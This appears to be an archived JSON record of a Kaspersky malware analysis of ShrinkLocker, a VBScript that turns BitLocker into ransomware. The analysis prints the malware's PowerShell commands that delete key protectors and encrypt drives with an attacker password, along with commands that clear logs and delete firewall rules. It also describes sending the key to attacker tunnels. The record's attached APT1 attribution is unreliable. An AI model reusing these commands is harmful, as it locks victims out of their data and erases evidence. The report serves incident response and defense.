{
	"id": "30982f38-7604-4e0f-af1c-0cc19ea36226",
	"created_at": "2026-04-06T03:36:18.761656Z",
	"updated_at": "2026-04-10T13:11:18.29061Z",
	"deleted_at": null,
	"sha1_hash": "d79320b8706e8177886fea61b65a120fcd9baa77",
	"title": "ShrinkLocker: Turning BitLocker into ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 900042,
	"plain_text": "ShrinkLocker: Turning BitLocker into ransomware\r\nBy Cristian Souza\r\nPublished: 2024-05-23 · Archived: 2026-04-06 03:31:20 UTC\r\nIntroduction\r\nAttackers always find creative ways to bypass defensive features and accomplish their goals. This can be done\r\nwith packers, crypters, and code obfuscation. However, one of the best ways of evading detection, as well as\r\nmaximizing compatibility, is to use the operating system’s own features. In the context of ransomware threats, one\r\nnotable example is leveraging exported functions present in the cryptography DLL ADVAPI32.dll, such as\r\nCryptAcquireContextA, CryptEncrypt, and CryptDecrypt. In this way, the adversaries can make sure that the\r\nmalware can run and simulate normal behavior in various versions of the OS that support this DLL.\r\nAlthough this seems smart enough, another clever technique caught our attention in a recent incident response\r\nengagement: using the native BitLocker feature to encrypt entire volumes and stealing the decryption key. The\r\noriginal purpose of BitLocker is to address the risks of data theft or exposure from lost, stolen, or improperly\r\ndecommissioned devices. Nonetheless, threat actors have found out that this mechanism can be repurposed for\r\nmalicious ends to great effect.\r\nIn that incident, the attackers were able to deploy and run an advanced VBS script that took advantage of\r\nBitLocker for unauthorized file encryption. We spotted this script and its modified versions in Mexico, Indonesia,\r\nand Jordan. In the sections below, we analyze in detail the malicious code obtained during our incident response\r\neffort and provide tips for mitigating this kind of threat.\r\nThis is not the first time we have seen BitLocker used for encrypting drives and demanding a ransom. Previously,\r\nattackers used this Microsoft utility to encrypt critical systems after accessing and controlling these. In this case,\r\nhowever, the adversary took additional steps to maximize the damage from the attack and hinder an effective\r\nresponse to the incident.\r\nVBScript analysis\r\nOne interesting fact is that the attackers did not bother to obfuscate the bulk of the code, as threat actors typically\r\ndo. The most plausible explanation for this is that they already had full control of the target system when the script\r\nwas executed. It is stored at C:\\ProgramData\\Microsoft\\Windows\\Templates\\ as Disk.vbs. Its first lines contain\r\na function that converts a string to its binary representation using an ADODB.Stream object. This function is later\r\nused for encoding data to be sent in an HTTP POST request.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 1 of 15\n\nStream_StringToBinary function\r\nThe first step by the main function of the script is to use Windows Management Instrumentation (WMI) to query\r\ninformation about the operating system with the help of the Win32_OperatingSystem class. For each object\r\nwithin the query results, the script checks if the current domain is different from the target. If it is, the script\r\nfinishes automatically. After that, it checks if the name of the operating system contains “xp”, “2000”, “2003”, or\r\n“vista”, and if the Windows version matches any one of these, the script finishes automatically and deletes itself.\r\nInitial conditions for execution\r\nAfter that, the script continues to rely on WMI for querying information about the OS. It then performs disk\r\nresizing operations, which may vary with the result of the OS version check. These operations are performed\r\nsolely on fixed drives (DriveType = 3). The following drive types typically exist in a file system:\r\n1 $DriveType_map = @{\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 2 of 15\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n0 = 'Unknown'\r\n1 = 'No Root Directory'\r\n2 = 'Removable Disk'\r\n3 = 'Local Disk'  This is the DriveType searched by the malware.\r\n4 = 'Network Drive'\r\n5 = 'Compact Disc'\r\n6 = 'RAM Disk'\r\n}\r\nThe likely reason the malware does not try to perform same operations on network drives (DriveType = 4) is to\r\navoid triggering detection tools on the network.\r\nTo resize local drives in Windows Server 2008 or 2012, the script checks the primary boot partition and saves this\r\ninformation. It saves the index of the different partitions and then performs the following actions using diskpart:\r\nShrink the size of each non-boot partition by 100 MB. This creates 100 MB in unallocated space in each\r\npartition other than the boot volume;\r\nSplit the unallocated space into new 100 MB primary partitions;\r\nFormat the partitions with the override option, which forces the volume to dismount first if necessary, and\r\nassigns a file system and a drive letter to each;\r\nActivate the partitions;\r\nIf the shrink procedure was successful, save “ok” as a variable, so the script can continue.\r\nDisk resizing operations performed by the script in Windows Server 2008 and 2012\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 3 of 15\n\nIf the operation is successful, the code uses the utility bcdboot and the drive letter saved previously as a boot\r\nvolume to reinstall the boot files on the new primary partitions.\r\nBoot files reinstall\r\nThe partition shrink operations for other OS versions are similar but implemented with a different piece of code\r\nfor compatibility reasons. The example below shows the process as applied to the Windows versions 7, 8, and 8.1.\r\nDisk resizing operations in the Windows versions 7, 8, or 8.1\r\nFor Windows 2008 or 7, after the partition shrink procedure finishes, the variable matchedDrives saves the drive\r\nletters separated by commas, but only if the file system is NFTS, exFAT, FAT32, ReFS, or FAT. The code was\r\nmodified to print an example:\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 4 of 15\n\nmatchedDrives variable data\r\nThe script then adds the following registry entries:\r\nfDenyTSConnections = 1: disables RDP connections;\r\nscforceoption = 1: enforces smart card authentication;\r\nUseAdvancedStartup = 1: requires the use of the BitLocker PIN for pre-boot authentication;\r\nEnableBDEWithNoTPM = 1: allows BitLocker without a compatible TPM chip;\r\nUseTPM = 2: allows the use of TPM if available;\r\nUseTPMPIN = 2: allows the use of a startup PIN with TPM if available;\r\nUseTPMKey = 2: allows the use of a startup key with TPM if available;\r\nUseTPMKeyPIN = 2: allows the use of a startup key and PIN with TPM if available;\r\nEnableNonTPM = 1: allows BitLocker without a compatible TPM chip, requires a password or startup key\r\non a USB flash drive;\r\nUsePartialEncryptionKey = 2: requires the use of a startup key with TPM;\r\nUsePIN = 2: requires the use of a startup PIN with TPM.\r\nIf the script detects an error, it restarts the system.\r\nRegistry modifications\r\nBy analyzing the malware dynamically, we can confirm the registry changes performed:\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 5 of 15\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMPIN: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMKey: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UseTPMKeyPIN: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\EnableNonTPM: 0x00000001\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UsePartialEncryptionKey: 0x00000002\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\FVE\\UsePIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseAdvancedStartup: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\EnableBDEWithNoTPM: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPM: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMPIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMKey: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UseTPMKeyPIN: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\EnableNonTPM: 0x00000001\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UsePartialEncryptionKey: 0x00000002\r\nHKLM\\SOFTWARE\\WOW6432Node\\Policies\\Microsoft\\FVE\\UsePIN: 0x00000002\r\nInterestingly enough, there are several functions performing these operations, each designed for a different version\r\nof Windows. In some conditionals, it checks if BitLocker Drive Encryption Tools are active through the ID 266 of\r\nRemote Server Administration Tools. The malware then checks if the BitLocker Drive Encryption Service\r\n(BDESVC) is running. If not, it starts the service.\r\nBDESVC verification\r\nThe script also changes the label of the new boot partitions to the attacker’s email as shown in the images below,\r\nso the victim can contact them.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 6 of 15\n\nDrive label modification\r\nAttacker’s email as a drive label\r\nAfter that, the malware disables the protectors used to secure BitLocker’s encryption key and deletes them. The\r\ndeletion method may vary depending on the version of the OS. In a Windows Server 2008 or Windows 7 scenario,\r\nthis is accomplished via VBS features, after which the script uses PowerShell to force the deletion of the\r\nprotectors.\r\nHaving completed the deletion, it enables the use of a numerical password as a protector and the encryption\r\nfeature.\r\nProtectors deletion\r\nThe reason for deleting the default protectors is to avoid the recovery of the keys by the user, as in the example\r\nbelow.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 7 of 15\n\nThe recovery of BitLocker keys\r\nAs the next step, the 64-character encryption key is generated by the malware using a random multiplication and\r\nreplacement of the following elements:\r\nA variable with the numbers 0–9;\r\nThe famous pangram, “The quick brown fox jumps over the lazy dog”, in lowercase and uppercase, which\r\ncontains every letter of the English alphabet;\r\nSpecial characters.\r\nThe randomness of this password is accomplished by a seed made of various elements of the affected system, such\r\nas used memory and network statistics. Later, this information is sent to the attacker. We tested the key generation\r\nlogic in our environment, and with a slight modification of the script, we were able to see the generated password.\r\nKey generation process\r\nThe code then converts the previously generated encryption key to a secure string—a PowerShell option that\r\nprevents creating a string object in memory—and effectively enables BitLocker on the drives.\r\n1 If Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command \"\"$protectors = (Get-BitLockerVolume -MountPoint \" \u0026 drives(i) \u0026 \").KeyProtector; if ($protectors -ne $null) { foreach\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 8 of 15\n\n2\r\n3\r\n4\r\n5\r\n($protector in $protectors) { Remove-BitLockerKeyProtector -MountPoint \" \u0026 drives(i) \u0026 \" -\r\nKeyProtectorId $protector.KeyProtectorId } }\"\"\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command $a=ConvertTo-SecureString \"\r\n\u0026 Chr(34)  \u0026 Chr(39) \u0026 strRandom \u0026 Chr(39)  \u0026 Chr(34) \u0026 \" -asplaintext -force;Enable-BitLocker \" \u0026\r\ndrives(i) \u0026 \" -s -qe -pwp -pw $a\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"powershell.exe -Command Resume-BitLocker -\r\nMountPoint \" \u0026 drives(i) \u0026 \" \")).stdout.readall) \u003e 0 Then: End If\r\nThe script then creates an HTTP POST request object using the following options:\r\nUse WinHTTP version 5.1.\r\nAccept the French language.\r\nIgnore SSL errors (httpRequest.Option(4) = 13056 à WinHttpRequestOption_SslErrorIgnoreFlags).\r\nDisable redirects (httpRequest.Option(6) = false à WinHttpRequestOption_EnableRedirects).\r\nThe attackers used the domain trycloudflare.com to obfuscate their real address. This domain is legitimate, it\r\nbelongs to CloudFlare and is used to provide quick tunnels for developers. The subdomain configured by the\r\nattackers was scottish-agreement-laundry-further.\r\nRequest creation\r\nThe malware also includes information about the machine and the generated password as a payload for the POST\r\nrequest, as shown in the image below.\r\nInformation to be sent in the POST request\r\nThe script also contains a loop that tries to send the information to the attacker five times if an error occurs.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 9 of 15\n\nRetry procedure\r\nWith some tweaks, we were able to print the data being sent to the attacker, as shown in the image below. Note\r\nthat the data includes the computer name, Windows version, drives affected, and the password string.\r\nConsequently, the victim’s IP address will also be logged on the attacker’s server, allowing them to track each\r\nvictim.\r\nInformation to be sent\r\nAfter removing the BitLocker protectors and configuring drive encryption, the script goes through the following\r\nsteps to cover its tracks.\r\nIt validates if the hostname is the target of this malware, then deletes the files:\r\n\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml\r\n\\scripts\\Login.vbs\r\n\\scripts\\Disk.vbs\r\nC:\\ProgramData\\Microsoft\\Windows\\Templates\\Disk.vbs\r\nDelete operations\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 10 of 15\n\nThe script then clears the Windows PowerShell and Microsoft-Windows-PowerShell/Operational logs with\r\nwevtutil. It turns on the system firewall and deletes all of its rules. It also deletes the tasks VolumeInit and\r\nVolumeCheck. Finally, the malware performs a forced shutdown.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"wevtutil cl \"\"Windows PowerShell\"\"\")).stdout.readall) \u003e 0\r\nThen: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"wevtutil cl \"\"Microsoft-Windows-PowerShell/Operational\"\"\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"netsh advfirewall set allprofiles state on\")).stdout.readall) \u003e\r\n0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"netsh advfirewall firewall delet rule\r\nname=all\")).stdout.readall) \u003e 0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"schtasks /Delete /TN \"\"VolumeInit\"\" /F\")).stdout.readall) \u003e\r\n0 Then: End If\r\nIf Len((CreateObject(\"WScript.Shell\").Exec(\"schtasks /Delete /TN \"\"VolumeCheck\"\"\r\n/F\")).stdout.readall) \u003e 0 Then: End If\r\nAfter the shutdown, the victim will see the BitLocker screen. If the user tries to use the recovery options, they will\r\nsee nothing but the message, “There are no more BitLocker recovery options on your PC”.\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 11 of 15\n\nBitLocker recovery screen\r\nTactics, techniques and procedures\r\nThe analysis showed that this threat actor has an extensive understanding of the VBScript language, and Windows\r\ninternals and utilities, such as WMI, diskpart, and bcdboot. Below are the TTPs identified for this scenario.\r\nTactic Technique ID\r\nExecution Command and Scripting Interpreter: Visual Basic T1059.005\r\nExecution Windows Management Instrumentation T1047\r\nExecution Command and Scripting Interpreter: PowerShell T1059.001\r\nImpact Data Encrypted for Impact T1486\r\nImpact System Shutdown/Reboot T1529\r\nDefense evasion Clear Windows Event Logs T1070.001\r\nDefense evasion Modify Registry T1112\r\nDefense Evasion Disable or Modify System Firewall T1562.004\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 12 of 15\n\nExfiltration Exfiltration Over Web Service T1041\r\nArtifacts and digital forensics\r\nAs the local activity performed by the script includes cleaning up its traces, clearing some logs and the tasks\r\ncreated for execution, and finally, encrypting the whole drive, it was not easy to get forensic artifacts to identify\r\nthe malicious activities and to find opportunities for decryption.\r\nFortunately, some of the script content and commands executed were registered and logged by a third-party\r\nservice, and these were collected for analysis. This allowed us to obtain the secure strings to which the encryption\r\nkeys were converted from some of the affected systems.\r\nSecure strings obtained\r\nElsewhere, we attempted to collect network logs where the POST requests to the C2 were stored. However, the\r\nmost common configuration for web activity logging includes GET but unfortunately not POST requests.\r\nWe did finally obtain the POST requests, but this was very challenging. The case provides justification for logging\r\nPOST traffic and ensuring that all critical system activity is forwarded to a central repository with enough space\r\nfor storing data for the recommended retention period (six or more months) to avoid losing evidence after\r\nattackers remove all their traces from the individual systems.\r\nFinally, some systems in the customer’s infrastructure remained unencrypted and were considered unaffected at\r\nfirst. However, we later found out that they had, in fact, been affected, but BitLocker was not configured in these\r\nsystems. This made it possible for us to obtain the script itself, analyze its behavior and collect further evidence.\r\nRecovery\r\nWhile we could obtain some of the passphrases and fixed values implemented by the threat actor to create the\r\nencryption keys, the script includes some variable values and those are different for each single affected system,\r\nmaking the decryption process difficult.\r\nNetwork information collected for use in the seed\r\nMitigations\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 13 of 15\n\nCompanies are encouraged to use BitLocker or other encryption tools (such as VeraCrypt) to protect corporate\r\nsecrets. However, a few precautions must be taken to avoid the abuse by attackers.\r\nUse robust, properly configured EPP solution to detect threats that try to abuse BitLocker;\r\nImplement Managed Detection and Response (MDR) to proactively scan for threats;\r\nIf BitLocker is enabled, make sure you are using a strong password and have the recovery keys stored in a\r\nsecure location;\r\nEnsure that users have only minimal privileges. This way, they cannot enable encryption features or change\r\nregistry keys on their own;\r\nEnable network traffic logging and monitoring. Configure the logging of both GET and POST requests. In\r\ncase of infection, the requests made to the attacker’s domain may contain passwords or keys;\r\nMonitor for events associated with VBS execution and PowerShell, and save the logged scripts and\r\ncommands to an external repository storing activity that may be deleted locally;\r\nMake backups frequently, store them offline, and test them.\r\nIf you need assistance with investigation of a ransomware attack and recovering encrypted data, please contact us\r\nat gert@kaspersky.com.\r\nConclusion\r\nOur incident response and malware analysis are evidence that attackers are constantly refining their tactics to\r\nevade detection. In this incident, we observed the abuse of the native BitLocker feature for unauthorized data\r\nencryption. The VBS script demonstrates that the malicious actor involved in this attack have an excellent\r\nunderstanding of Windows internals. Although the script analysis was not complicated at all, this kind of threat is\r\ndifficult to detect, since unique strings inside the artifact can be easily modified to bypass YARA rules. Therefore,\r\nthe best detection method in scenarios like these is behavioral analysis, which correlates different actions\r\nperformed by the application to reach a verdict.\r\nKaspersky products detect the threat described in this article with the following verdicts:\r\nTrojan.VBS.SAgent.gen;\r\nTrojan-Ransom.VBS.BitLock.gen;\r\nTrojan.Win32.Generic.\r\nIndicators of compromise\r\nURLs:\r\nhxxps://scottish-agreement-laundry-further[dot]trycloudflare[dot]com/updatelog\r\nhxxps://generated-eating-meals-top[dot]trycloudflare.com/updatelog\r\nhxxps://generated-eating-meals-top[dot]trycloudflare.com/updatelogead\r\nhxxps://earthquake-js-westminster-searched[dot]trycloudflare.com:443/updatelog\r\nE-mail addresses:\r\nonboardingbinder[at]proton[dot]me\r\nconspiracyid9[at]protonmail[dot]com\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 14 of 15\n\nMD5 hashes:\r\n842f7b1c425c5cf41aed9df63888e768\r\nSource: https://securelist.com/ransomware-abuses-bitlocker/112643/\r\nhttps://securelist.com/ransomware-abuses-bitlocker/112643/\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/ransomware-abuses-bitlocker/112643/"
	],
	"report_names": [
		"112643"
	],
	"threat_actors": [
		{
			"id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb",
			"created_at": "2023-01-06T13:46:38.228042Z",
			"updated_at": "2026-04-10T02:00:02.883048Z",
			"deleted_at": null,
			"main_name": "APT1",
			"aliases": [
				"PLA Unit 61398",
				"Comment Crew",
				"Byzantine Candor",
				"Comment Group",
				"GIF89a",
				"Group 3",
				"TG-8223",
				"Brown Fox",
				"ShadyRAT",
				"G0006",
				"COMMENT PANDA"
			],
			"source_name": "MISPGALAXY:APT1",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775446578,
	"ts_updated_at": 1775826678,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.pdf",
		"text": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.txt",
		"img": "https://archive.orkl.eu/d79320b8706e8177886fea61b65a120fcd9baa77.jpg"
	}
}